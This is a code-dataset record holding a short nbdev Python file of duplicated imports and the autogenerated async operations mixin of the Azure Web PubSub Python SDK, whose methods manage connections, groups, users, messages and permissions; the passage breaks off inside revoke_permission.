| 0.54878
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 1
| 0
|
0
| 10
|
ed2d63f5f8bc9f8acf6d662ebf75645c3e0ae2f8
| 282
|
py
|
Python
|
nbdev/None.py
|
GenerallyIntelligent/nbdev
|
a7c664ed858b35a0704ec2ba6c08e8dda0b4b76c
|
[
"Apache-2.0"
] | null | null | null |
nbdev/None.py
|
GenerallyIntelligent/nbdev
|
a7c664ed858b35a0704ec2ba6c08e8dda0b4b76c
|
[
"Apache-2.0"
] | null | null | null |
nbdev/None.py
|
GenerallyIntelligent/nbdev
|
a7c664ed858b35a0704ec2ba6c08e8dda0b4b76c
|
[
"Apache-2.0"
] | null | null | null |
# Cell
from .imports import *
from fastcore.script import *
from fastcore.foundation import *
from keyword import iskeyword
import nbformat
# Cell
from .imports import *
from fastcore.script import *
from fastcore.foundation import *
from keyword import iskeyword
import nbformat
| 18.8
| 33
| 0.801418
| 36
| 282
| 6.277778
| 0.277778
| 0.265487
| 0.318584
| 0.185841
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0.148936
| 282
| 15
| 34
| 18.8
| 0.941667
| 0.031915
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 13
|
ed68ff06fc822a7dda1a1ff554e769ed5043b424
| 47,460
|
py
|
Python
|
sdk/webpubsub/azure-messaging-webpubsubservice/azure/messaging/webpubsubservice/aio/operations/_operations.py
|
praveenkuttappan/azure-sdk-for-python
|
4b79413667b7539750a6c7dde15737013a3d4bd5
|
[
"MIT"
] | null | null | null |
sdk/webpubsub/azure-messaging-webpubsubservice/azure/messaging/webpubsubservice/aio/operations/_operations.py
|
praveenkuttappan/azure-sdk-for-python
|
4b79413667b7539750a6c7dde15737013a3d4bd5
|
[
"MIT"
] | 1
|
2021-06-07T06:37:28.000Z
|
2021-06-07T06:37:28.000Z
|
sdk/webpubsub/azure-messaging-webpubsubservice/azure/messaging/webpubsubservice/aio/operations/_operations.py
|
praveenkuttappan/azure-sdk-for-python
|
4b79413667b7539750a6c7dde15737013a3d4bd5
|
[
"MIT"
] | null | null | null |
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
import functools
from typing import Any, Callable, Dict, Generic, IO, List, Optional, TypeVar, Union
import warnings
from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import AsyncHttpResponse
from azure.core.rest import HttpRequest
from azure.core.tracing.decorator_async import distributed_trace_async
from ...operations._operations import build_add_connection_to_group_request, build_add_user_to_group_request, build_check_permission_request, build_close_all_connections_request, build_close_connection_request, build_close_group_connections_request, build_close_user_connections_request, build_connection_exists_request, build_generate_client_token_request, build_grant_permission_request, build_group_exists_request, build_remove_connection_from_group_request, build_remove_user_from_all_groups_request, build_remove_user_from_group_request, build_revoke_permission_request, build_send_to_all_request, build_send_to_connection_request, build_send_to_group_request, build_send_to_user_request, build_user_exists_request
T = TypeVar('T')
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, AsyncHttpResponse], T, Dict[str, Any]], Any]]
class WebPubSubServiceClientOperationsMixin:
@distributed_trace_async
async def generate_client_token(
self,
hub: str,
*,
user_id: Optional[str] = None,
role: Optional[List[str]] = None,
minutes_to_expire: Optional[int] = 60,
**kwargs: Any
) -> Any:
"""Generate token for the client to connect Azure Web PubSub service.
Generate token for the client to connect Azure Web PubSub service.
:param hub: Target hub name, which should start with alphabetic characters and only contain
alpha-numeric characters or underscore.
:type hub: str
:keyword user_id: User Id.
:paramtype user_id: str
:keyword role: Roles that the connection with the generated token will have.
:paramtype role: list[str]
:keyword minutes_to_expire: The expire time of the generated token.
:paramtype minutes_to_expire: int
:return: JSON object
:rtype: Any
:raises: ~azure.core.exceptions.HttpResponseError
Example:
.. code-block:: python
# response body for status code(s): 200
response.json() == {
"token": "str" # Optional. The token value for the WebSocket client to connect to the service.
}
"""
cls = kwargs.pop('cls', None) # type: ClsType[Any]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
request = build_generate_client_token_request(
hub=hub,
user_id=user_id,
role=role,
minutes_to_expire=minutes_to_expire,
template_url=self.generate_client_token.metadata['url'],
)
path_format_arguments = {
"Endpoint": self._serialize.url("self._config.endpoint", self._config.endpoint, 'str', skip_quote=True),
}
request.url = self._client.format_url(request.url, **path_format_arguments)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response)
if response.content:
deserialized = response.json()
else:
deserialized = None
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
generate_client_token.metadata = {'url': '/api/hubs/{hub}/:generateToken'} # type: ignore
@distributed_trace_async
async def close_all_connections(
self,
hub: str,
*,
excluded: Optional[List[str]] = None,
reason: Optional[str] = None,
**kwargs: Any
) -> None:
"""Close the connections in the hub.
Close the connections in the hub.
:param hub: Target hub name, which should start with alphabetic characters and only contain
alpha-numeric characters or underscore.
:type hub: str
:keyword excluded: Exclude these connectionIds when closing the connections in the hub.
:paramtype excluded: list[str]
:keyword reason: The reason closing the client connection.
:paramtype reason: str
:return: None
:rtype: None
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
request = build_close_all_connections_request(
hub=hub,
excluded=excluded,
reason=reason,
template_url=self.close_all_connections.metadata['url'],
)
path_format_arguments = {
"Endpoint": self._serialize.url("self._config.endpoint", self._config.endpoint, 'str', skip_quote=True),
}
request.url = self._client.format_url(request.url, **path_format_arguments)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [204]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response)
if cls:
return cls(pipeline_response, None, {})
close_all_connections.metadata = {'url': '/api/hubs/{hub}/:closeConnections'} # type: ignore
@distributed_trace_async
async def send_to_all(
self,
hub: str,
message: Union[IO, str],
*,
excluded: Optional[List[str]] = None,
**kwargs: Any
) -> None:
"""Broadcast content inside request body to all the connected client connections.
Broadcast content inside request body to all the connected client connections.
:param hub: Target hub name, which should start with alphabetic characters and only contain
alpha-numeric characters or underscore.
:type hub: str
:param message: The payload body.
:type message: IO or str
:keyword excluded: Excluded connection Ids.
:paramtype excluded: list[str]
:keyword str content_type: Media type of the body sent to the API. Default value is
"application/json". Allowed values are: "application/json", "application/octet-stream",
"text/plain."
:return: None
:rtype: None
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
content_type = kwargs.pop('content_type', "text/plain") # type: Optional[str]
json = None
content = None
if content_type.split(";")[0] in ['application/json', 'application/octet-stream']:
content = message
elif content_type.split(";")[0] in ['text/plain']:
json = message
else:
raise ValueError(
"The content_type '{}' is not one of the allowed values: "
"['application/json', 'application/octet-stream', 'text/plain']".format(content_type)
)
request = build_send_to_all_request(
hub=hub,
content_type=content_type,
excluded=excluded,
json=json,
content=content,
template_url=self.send_to_all.metadata['url'],
)
path_format_arguments = {
"Endpoint": self._serialize.url("self._config.endpoint", self._config.endpoint, 'str', skip_quote=True),
}
request.url = self._client.format_url(request.url, **path_format_arguments)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [202]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response)
if cls:
return cls(pipeline_response, None, {})
send_to_all.metadata = {'url': '/api/hubs/{hub}/:send'} # type: ignore
@distributed_trace_async
async def connection_exists(
self,
hub: str,
connection_id: str,
**kwargs: Any
) -> None:
"""Check if the connection with the given connectionId exists.
Check if the connection with the given connectionId exists.
:param hub: Target hub name, which should start with alphabetic characters and only contain
alpha-numeric characters or underscore.
:type hub: str
:param connection_id: The connection Id.
:type connection_id: str
:return: None
:rtype: None
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
request = build_connection_exists_request(
hub=hub,
connection_id=connection_id,
template_url=self.connection_exists.metadata['url'],
)
path_format_arguments = {
"Endpoint": self._serialize.url("self._config.endpoint", self._config.endpoint, 'str', skip_quote=True),
}
request.url = self._client.format_url(request.url, **path_format_arguments)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 404]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response)
if cls:
return cls(pipeline_response, None, {})
connection_exists.metadata = {'url': '/api/hubs/{hub}/connections/{connectionId}'} # type: ignore
@distributed_trace_async
async def close_connection(
self,
hub: str,
connection_id: str,
*,
reason: Optional[str] = None,
**kwargs: Any
) -> None:
"""Close the client connection.
Close the client connection.
:param hub: Target hub name, which should start with alphabetic characters and only contain
alpha-numeric characters or underscore.
:type hub: str
:param connection_id: Target connection Id.
:type connection_id: str
:keyword reason: The reason closing the client connection.
:paramtype reason: str
:return: None
:rtype: None
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
request = build_close_connection_request(
hub=hub,
connection_id=connection_id,
reason=reason,
template_url=self.close_connection.metadata['url'],
)
path_format_arguments = {
"Endpoint": self._serialize.url("self._config.endpoint", self._config.endpoint, 'str', skip_quote=True),
}
request.url = self._client.format_url(request.url, **path_format_arguments)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [204]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response)
if cls:
return cls(pipeline_response, None, {})
close_connection.metadata = {'url': '/api/hubs/{hub}/connections/{connectionId}'} # type: ignore
@distributed_trace_async
async def send_to_connection(
self,
hub: str,
connection_id: str,
message: Union[IO, str],
**kwargs: Any
) -> None:
"""Send content inside request body to the specific connection.
Send content inside request body to the specific connection.
:param hub: Target hub name, which should start with alphabetic characters and only contain
alpha-numeric characters or underscore.
:type hub: str
:param connection_id: The connection Id.
:type connection_id: str
:param message: The payload body.
:type message: IO or str
:keyword str content_type: Media type of the body sent to the API. Default value is
"application/json". Allowed values are: "application/json", "application/octet-stream",
"text/plain."
:return: None
:rtype: None
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
content_type = kwargs.pop('content_type', "text/plain") # type: Optional[str]
json = None
content = None
if content_type.split(";")[0] in ['application/json', 'application/octet-stream']:
content = message
elif content_type.split(";")[0] in ['text/plain']:
json = message
else:
raise ValueError(
"The content_type '{}' is not one of the allowed values: "
"['application/json', 'application/octet-stream', 'text/plain']".format(content_type)
)
request = build_send_to_connection_request(
hub=hub,
connection_id=connection_id,
content_type=content_type,
json=json,
content=content,
template_url=self.send_to_connection.metadata['url'],
)
path_format_arguments = {
"Endpoint": self._serialize.url("self._config.endpoint", self._config.endpoint, 'str', skip_quote=True),
}
request.url = self._client.format_url(request.url, **path_format_arguments)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [202]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response)
if cls:
return cls(pipeline_response, None, {})
send_to_connection.metadata = {'url': '/api/hubs/{hub}/connections/{connectionId}/:send'} # type: ignore
@distributed_trace_async
async def group_exists(
self,
hub: str,
group: str,
**kwargs: Any
) -> None:
"""Check if there are any client connections inside the given group.
Check if there are any client connections inside the given group.
:param hub: Target hub name, which should start with alphabetic characters and only contain
alpha-numeric characters or underscore.
:type hub: str
:param group: Target group name, which length should be greater than 0 and less than 1025.
:type group: str
:return: None
:rtype: None
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
request = build_group_exists_request(
hub=hub,
group=group,
template_url=self.group_exists.metadata['url'],
)
path_format_arguments = {
"Endpoint": self._serialize.url("self._config.endpoint", self._config.endpoint, 'str', skip_quote=True),
}
request.url = self._client.format_url(request.url, **path_format_arguments)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 404]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response)
if cls:
return cls(pipeline_response, None, {})
group_exists.metadata = {'url': '/api/hubs/{hub}/groups/{group}'} # type: ignore
@distributed_trace_async
async def close_group_connections(
self,
hub: str,
group: str,
*,
excluded: Optional[List[str]] = None,
reason: Optional[str] = None,
**kwargs: Any
) -> None:
"""Close connections in the specific group.
Close connections in the specific group.
:param hub: Target hub name, which should start with alphabetic characters and only contain
alpha-numeric characters or underscore.
:type hub: str
:param group: Target group name, which length should be greater than 0 and less than 1025.
:type group: str
:keyword excluded: Exclude these connectionIds when closing the connections in the group.
:paramtype excluded: list[str]
:keyword reason: The reason closing the client connection.
:paramtype reason: str
:return: None
:rtype: None
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
request = build_close_group_connections_request(
hub=hub,
group=group,
excluded=excluded,
reason=reason,
template_url=self.close_group_connections.metadata['url'],
)
path_format_arguments = {
"Endpoint": self._serialize.url("self._config.endpoint", self._config.endpoint, 'str', skip_quote=True),
}
request.url = self._client.format_url(request.url, **path_format_arguments)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [204]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response)
if cls:
return cls(pipeline_response, None, {})
close_group_connections.metadata = {'url': '/api/hubs/{hub}/groups/{group}/:closeConnections'} # type: ignore
@distributed_trace_async
async def send_to_group(
self,
hub: str,
group: str,
message: Union[IO, str],
*,
excluded: Optional[List[str]] = None,
**kwargs: Any
) -> None:
"""Send content inside request body to a group of connections.
Send content inside request body to a group of connections.
:param hub: Target hub name, which should start with alphabetic characters and only contain
alpha-numeric characters or underscore.
:type hub: str
:param group: Target group name, which length should be greater than 0 and less than 1025.
:type group: str
:param message: The payload body.
:type message: IO or str
:keyword excluded: Excluded connection Ids.
:paramtype excluded: list[str]
:keyword str content_type: Media type of the body sent to the API. Default value is
"application/json". Allowed values are: "application/json", "application/octet-stream",
"text/plain."
:return: None
:rtype: None
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
content_type = kwargs.pop('content_type', "text/plain") # type: Optional[str]
json = None
content = None
if content_type.split(";")[0] in ['application/json', 'application/octet-stream']:
content = message
elif content_type.split(";")[0] in ['text/plain']:
json = message
else:
raise ValueError(
"The content_type '{}' is not one of the allowed values: "
"['application/json', 'application/octet-stream', 'text/plain']".format(content_type)
)
request = build_send_to_group_request(
hub=hub,
group=group,
content_type=content_type,
excluded=excluded,
json=json,
content=content,
template_url=self.send_to_group.metadata['url'],
)
path_format_arguments = {
"Endpoint": self._serialize.url("self._config.endpoint", self._config.endpoint, 'str', skip_quote=True),
}
request.url = self._client.format_url(request.url, **path_format_arguments)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [202]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response)
if cls:
return cls(pipeline_response, None, {})
send_to_group.metadata = {'url': '/api/hubs/{hub}/groups/{group}/:send'} # type: ignore
@distributed_trace_async
async def add_connection_to_group(
self,
hub: str,
group: str,
connection_id: str,
**kwargs: Any
) -> None:
"""Add a connection to the target group.
Add a connection to the target group.
:param hub: Target hub name, which should start with alphabetic characters and only contain
alpha-numeric characters or underscore.
:type hub: str
:param group: Target group name, which length should be greater than 0 and less than 1025.
:type group: str
:param connection_id: Target connection Id.
:type connection_id: str
:return: None
:rtype: None
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
request = build_add_connection_to_group_request(
hub=hub,
group=group,
connection_id=connection_id,
template_url=self.add_connection_to_group.metadata['url'],
)
path_format_arguments = {
"Endpoint": self._serialize.url("self._config.endpoint", self._config.endpoint, 'str', skip_quote=True),
}
request.url = self._client.format_url(request.url, **path_format_arguments)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 404]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response)
if cls:
return cls(pipeline_response, None, {})
add_connection_to_group.metadata = {'url': '/api/hubs/{hub}/groups/{group}/connections/{connectionId}'} # type: ignore
@distributed_trace_async
async def remove_connection_from_group(
self,
hub: str,
group: str,
connection_id: str,
**kwargs: Any
) -> None:
"""Remove a connection from the target group.
Remove a connection from the target group.
:param hub: Target hub name, which should start with alphabetic characters and only contain
alpha-numeric characters or underscore.
:type hub: str
:param group: Target group name, which length should be greater than 0 and less than 1025.
:type group: str
:param connection_id: Target connection Id.
:type connection_id: str
:return: None
:rtype: None
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
request = build_remove_connection_from_group_request(
hub=hub,
group=group,
connection_id=connection_id,
template_url=self.remove_connection_from_group.metadata['url'],
)
path_format_arguments = {
"Endpoint": self._serialize.url("self._config.endpoint", self._config.endpoint, 'str', skip_quote=True),
}
request.url = self._client.format_url(request.url, **path_format_arguments)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [204]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response)
if cls:
return cls(pipeline_response, None, {})
remove_connection_from_group.metadata = {'url': '/api/hubs/{hub}/groups/{group}/connections/{connectionId}'} # type: ignore
@distributed_trace_async
async def user_exists(
self,
hub: str,
user_id: str,
**kwargs: Any
) -> None:
"""Check if there are any client connections connected for the given user.
Check if there are any client connections connected for the given user.
:param hub: Target hub name, which should start with alphabetic characters and only contain
alpha-numeric characters or underscore.
:type hub: str
:param user_id: Target user Id.
:type user_id: str
:return: None
:rtype: None
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
request = build_user_exists_request(
hub=hub,
user_id=user_id,
template_url=self.user_exists.metadata['url'],
)
path_format_arguments = {
"Endpoint": self._serialize.url("self._config.endpoint", self._config.endpoint, 'str', skip_quote=True),
}
request.url = self._client.format_url(request.url, **path_format_arguments)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 404]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response)
if cls:
return cls(pipeline_response, None, {})
user_exists.metadata = {'url': '/api/hubs/{hub}/users/{userId}'} # type: ignore
@distributed_trace_async
async def close_user_connections(
self,
hub: str,
user_id: str,
*,
excluded: Optional[List[str]] = None,
reason: Optional[str] = None,
**kwargs: Any
) -> None:
"""Close connections for the specific user.
Close connections for the specific user.
:param hub: Target hub name, which should start with alphabetic characters and only contain
alpha-numeric characters or underscore.
:type hub: str
:param user_id: The user Id.
:type user_id: str
:keyword excluded: Exclude these connectionIds when closing the connections for the user.
:paramtype excluded: list[str]
:keyword reason: The reason closing the client connection.
:paramtype reason: str
:return: None
:rtype: None
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
request = build_close_user_connections_request(
hub=hub,
user_id=user_id,
excluded=excluded,
reason=reason,
template_url=self.close_user_connections.metadata['url'],
)
path_format_arguments = {
"Endpoint": self._serialize.url("self._config.endpoint", self._config.endpoint, 'str', skip_quote=True),
}
request.url = self._client.format_url(request.url, **path_format_arguments)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [204]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response)
if cls:
return cls(pipeline_response, None, {})
close_user_connections.metadata = {'url': '/api/hubs/{hub}/users/{userId}/:closeConnections'} # type: ignore
@distributed_trace_async
async def send_to_user(
self,
hub: str,
user_id: str,
message: Union[IO, str],
**kwargs: Any
) -> None:
"""Send content inside request body to the specific user.
Send content inside request body to the specific user.
:param hub: Target hub name, which should start with alphabetic characters and only contain
alpha-numeric characters or underscore.
:type hub: str
:param user_id: The user Id.
:type user_id: str
:param message: The payload body.
:type message: IO or str
:keyword str content_type: Media type of the body sent to the API. Default value is
"application/json". Allowed values are: "application/json", "application/octet-stream",
"text/plain."
:return: None
:rtype: None
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
content_type = kwargs.pop('content_type', "text/plain") # type: Optional[str]
json = None
content = None
if content_type.split(";")[0] in ['application/json', 'application/octet-stream']:
content = message
elif content_type.split(";")[0] in ['text/plain']:
json = message
else:
raise ValueError(
"The content_type '{}' is not one of the allowed values: "
"['application/json', 'application/octet-stream', 'text/plain']".format(content_type)
)
request = build_send_to_user_request(
hub=hub,
user_id=user_id,
content_type=content_type,
json=json,
content=content,
template_url=self.send_to_user.metadata['url'],
)
path_format_arguments = {
"Endpoint": self._serialize.url("self._config.endpoint", self._config.endpoint, 'str', skip_quote=True),
}
request.url = self._client.format_url(request.url, **path_format_arguments)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [202]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response)
if cls:
return cls(pipeline_response, None, {})
send_to_user.metadata = {'url': '/api/hubs/{hub}/users/{userId}/:send'} # type: ignore
@distributed_trace_async
async def add_user_to_group(
self,
hub: str,
group: str,
user_id: str,
**kwargs: Any
) -> None:
"""Add a user to the target group.
Add a user to the target group.
:param hub: Target hub name, which should start with alphabetic characters and only contain
alpha-numeric characters or underscore.
:type hub: str
:param group: Target group name, which length should be greater than 0 and less than 1025.
:type group: str
:param user_id: Target user Id.
:type user_id: str
:return: None
:rtype: None
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
request = build_add_user_to_group_request(
hub=hub,
group=group,
user_id=user_id,
template_url=self.add_user_to_group.metadata['url'],
)
path_format_arguments = {
"Endpoint": self._serialize.url("self._config.endpoint", self._config.endpoint, 'str', skip_quote=True),
}
request.url = self._client.format_url(request.url, **path_format_arguments)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 404]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response)
if cls:
return cls(pipeline_response, None, {})
add_user_to_group.metadata = {'url': '/api/hubs/{hub}/users/{userId}/groups/{group}'} # type: ignore
@distributed_trace_async
async def remove_user_from_group(
self,
hub: str,
group: str,
user_id: str,
**kwargs: Any
) -> None:
"""Remove a user from the target group.
Remove a user from the target group.
:param hub: Target hub name, which should start with alphabetic characters and only contain
alpha-numeric characters or underscore.
:type hub: str
:param group: Target group name, which length should be greater than 0 and less than 1025.
:type group: str
:param user_id: Target user Id.
:type user_id: str
:return: None
:rtype: None
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
request = build_remove_user_from_group_request(
hub=hub,
group=group,
user_id=user_id,
template_url=self.remove_user_from_group.metadata['url'],
)
path_format_arguments = {
"Endpoint": self._serialize.url("self._config.endpoint", self._config.endpoint, 'str', skip_quote=True),
}
request.url = self._client.format_url(request.url, **path_format_arguments)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [204]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response)
if cls:
return cls(pipeline_response, None, {})
remove_user_from_group.metadata = {'url': '/api/hubs/{hub}/users/{userId}/groups/{group}'} # type: ignore
@distributed_trace_async
async def remove_user_from_all_groups(
self,
hub: str,
user_id: str,
**kwargs: Any
) -> None:
"""Remove a user from all groups.
Remove a user from all groups.
:param hub: Target hub name, which should start with alphabetic characters and only contain
alpha-numeric characters or underscore.
:type hub: str
:param user_id: Target user Id.
:type user_id: str
:return: None
:rtype: None
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
request = build_remove_user_from_all_groups_request(
hub=hub,
user_id=user_id,
template_url=self.remove_user_from_all_groups.metadata['url'],
)
path_format_arguments = {
"Endpoint": self._serialize.url("self._config.endpoint", self._config.endpoint, 'str', skip_quote=True),
}
request.url = self._client.format_url(request.url, **path_format_arguments)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [204]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response)
if cls:
return cls(pipeline_response, None, {})
remove_user_from_all_groups.metadata = {'url': '/api/hubs/{hub}/users/{userId}/groups'} # type: ignore
@distributed_trace_async
async def grant_permission(
self,
hub: str,
permission: str,
connection_id: str,
*,
target_name: Optional[str] = None,
**kwargs: Any
) -> None:
"""Grant permission to the connection.
Grant permission to the connection.
:param hub: Target hub name, which should start with alphabetic characters and only contain
alpha-numeric characters or underscore.
:type hub: str
:param permission: The permission: current supported actions are joinLeaveGroup and
sendToGroup. Possible values are: "sendToGroup" or "joinLeaveGroup".
:type permission: str
:param connection_id: Target connection Id.
:type connection_id: str
:keyword target_name: The meaning of the target depends on the specific permission. For
joinLeaveGroup and sendToGroup, targetName is a required parameter standing for the group name.
:paramtype target_name: str
:return: None
:rtype: None
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
request = build_grant_permission_request(
hub=hub,
permission=permission,
connection_id=connection_id,
target_name=target_name,
template_url=self.grant_permission.metadata['url'],
)
path_format_arguments = {
"Endpoint": self._serialize.url("self._config.endpoint", self._config.endpoint, 'str', skip_quote=True),
}
request.url = self._client.format_url(request.url, **path_format_arguments)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response)
if cls:
return cls(pipeline_response, None, {})
grant_permission.metadata = {'url': '/api/hubs/{hub}/permissions/{permission}/connections/{connectionId}'} # type: ignore
@distributed_trace_async
async def revoke_permission(
self,
hub: str,
permission: str,
connection_id: str,
*,
target_name: Optional[str] = None,
**kwargs: Any
